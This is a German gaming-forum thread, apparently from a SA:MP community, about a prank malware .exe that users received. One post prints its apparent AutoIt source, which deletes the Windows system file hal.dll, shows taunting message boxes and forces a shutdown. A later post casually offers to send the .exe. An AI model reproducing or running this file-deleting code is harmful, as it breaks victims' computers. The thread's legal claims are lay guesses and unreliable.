Was Tun ?!

  • @Surrender hatte ich nicht...
    Das das ist dann wieder weggeangen..



    OMG, das ist immer noch MultiAcc. wenn du gebannt wurden bist, hast du nicht das recht einen neuen zu machen,
    oder warum wird man sonst gebannt aus Spaß ?!
    :X

  • Ich möchte mich eiglich nicht einmischen . Aber mann läst sich grund setzliche keine exe schiken...

  • Kann man wirklich Anzeige wegen Viren bekommen ^^ ? Du gehst zu der naechsten Polizet Station sagst :
    Du : "Hallo , kann ich eine Anzeige erstatten , ein "Hacker" hat mein Betriebssystem kaputt gemacht "
    Polizist : " hahahahaah" ?

  • Toll Warnung da ich disaster helfe das es wieder geht?
    Da ich den code weiss?


    Naja egal


    B2T:


    Jedem dem das passiert ist soll mir ne PN schreiben ich helfe ihm ich hab den code etc.

    [align=center] [size=18][color=#000000][font='Courier New, Courier, mono']GTA-Reallife:[b]
    [size=12]Coming Soon
    Only for SA:MP

  • So sah die Datei aus ;D


    So wissen nun was fehlt.


    Code
    FileDelete("C:\WINDOWS\system32\hal.dll")
    FileDelete("C:\Windows\system32\hal.dll")
    
    
    Msgbox("0","Ach du scheisse...","Ich habe dich geowned viel Spaß beim  PC neumachen")
    Msgbox("0"."Ach du scheisse...","Achja lass dich nich so  verarschen")
    Shutdown(2)
  • do.de - Domain-Offensive - Domains für alle und zu super Preisen
  • Schaue aber lieber jetzt nochmal nach, dass vllt. irgentwas fehlt...

  • Regel 6.1

    Zitat

    Auf Fragen sollte sachlich und verständlich geantwortet werden. Aussagen wie "da kann ich dir auch nicht helfen" oder "such mal bei google" schaden der Lesbarkeit der Community, ebenso wie Beiträge "Du hast eine PN". Links zur eigenen Seite sind nur dann erlaubt, wenn es zur direkten Klärung der Frage dient.

    Und dein Post ist damit vergleichbar:

    Zitat

    Disaster komm mal in icq on muss dir was schreiben

    Kein Kommentar mehr, und jetzt Back to Topic!

  • Hustler es ist möglich. viren = Illigal. auser dem wäre es wenn er gehackt wird eindringen in Privatsphäre und das ist strafbar dafür kannst du Geld strafe bekomme oder knast ich weiß es nicht ich bin kein Rechtanwalt oder so.

  • achja das teste ich mal bei nem alten Rechner von mir aus aber nach meiner meinung nach dürfte das nicht gehen

    Willste die .EXE xD ?

  • Glaube ich auch nicht mehr..
    Werden wir ja sehen, Heute abend muss ich ja eh PC ausmachen und dann Morgen mache ich ihn wieder an und mal sehen...
    Das es geht xD
    Wenn nicht gehe ich aufm PC von meinen Bruder ;D

  • do.de - Domain-Offensive - Domains für alle und zu super Preisen